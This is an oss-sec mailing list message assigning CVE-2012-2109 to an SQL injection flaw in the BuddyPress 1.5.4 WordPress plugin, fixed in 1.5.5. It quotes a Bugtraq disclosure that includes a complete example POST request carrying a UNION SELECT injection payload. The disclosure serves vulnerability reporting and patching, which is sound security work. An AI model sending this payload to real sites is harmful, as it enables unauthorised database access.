oss-sec mailing list archives

Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4

From: Kurt Seifried <kseifried () redhat com>
Date: Mon, 16 Apr 2012 13:36:14 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 04/15/2012 03:05 AM, Henri Salo wrote:

Hello,

Can I get 2012 CVE-identifier for WordPress BuddyPress-plugin
SQL-injection.

Affected: 1.5.4 Fixed: 1.5.5 Vendor:
http://buddypress.org/2012/03/buddypress-1-5-5/ OSVDB:
http://osvdb.org/show/osvdb/80763 Changelog:
http://codex.buddypress.org/releases/version-1-5/ (doesn't seem to
say about this issue)


Please use CVE-2012-2109for this issue.

http://seclists.org/bugtraq/2012/Apr/4 """ Hi,

I would like disclosure SQL injection vulnerability if Buddypress
plugin affecting last versions. This issue was reported to
developers and resolved in 1.5.5 version. So, I suggest all having
this plugin in their blogs update to last version, if you haven't
done it yet. Example of POST message with sql injection is below.

POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: example.com 
Accept: */* Referer: http://example.com/activity/?s=b Connection:
Keep-Alive Content-Length: 153 Content-Type:
application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

"""


- Henri Salo



- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJPjHSuAAoJEBYNRVNeJnmTudoP/2bj2DvLJ+omeUy1DbIrAw1f
5ar2lOrhYHt4UjOu3Nddx3Z7JuxL6ee7GjmdZ+AZwAXe1Di4Caho/n1gKP5dLTjc
HuIOgnNX7frGJvGLZn0mqQSM4CLg2HXLPZdk1w5P2eINMA6Gchb1ZmzGd3iPVPPK
+hW+K/4EkMOGvnfz1FU34IA8vgyzvre98ZVn7vRli7b2Hvu9cH49+9txqftMMh1u
tLO9lpjuuI+tzDlnm6FuTIEBX6zxcIMvdWEEXwKAjTmXeXgs3re/PvAV4TiqYGR2
gVquLgZupX534PGDDvJLOyfcLICoHCj/PZ1hTCvyVMbgtuoFNoMeUARxlHR6dzgD
00afqpScIvNji+Q/vSvQ7jU559+IAyq9Z0Mz+wYut3elcUi8GIkdJlt98xUqE4b+
M2ZPzkF+LnFTMBaIjgzjY1wqgmhyxQhaUDYXfO2qsAEi39oLVZpVNr+uAWnpGY58
YV5ilvmgqdILJt4cyYdc/aE3hrnsexGQntwGE8CeBUefqdq2LPEene8O2/rfoYkn
hSH9rtUN3sXIVClo7TsBX3ZGbi50CtH7FgHBzUrDRAflRkK1nSw8ZMMJy/cjPtz9
BfneEin1fctogvfo1L9xO9Lx4Z3G7gK/7xKXkhqiXsfVgwdBb3liUWo0LS2qcOy6
StSxvvLRwvnhFkQJlDrh
=+3UG
-----END PGP SIGNATURE-----

Current thread:

CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Henri Salo (Apr 15)
- Re: CVE-request: WordPress BuddyPress-plugin SQL-injection 1.5.4 Kurt Seifried (Apr 16)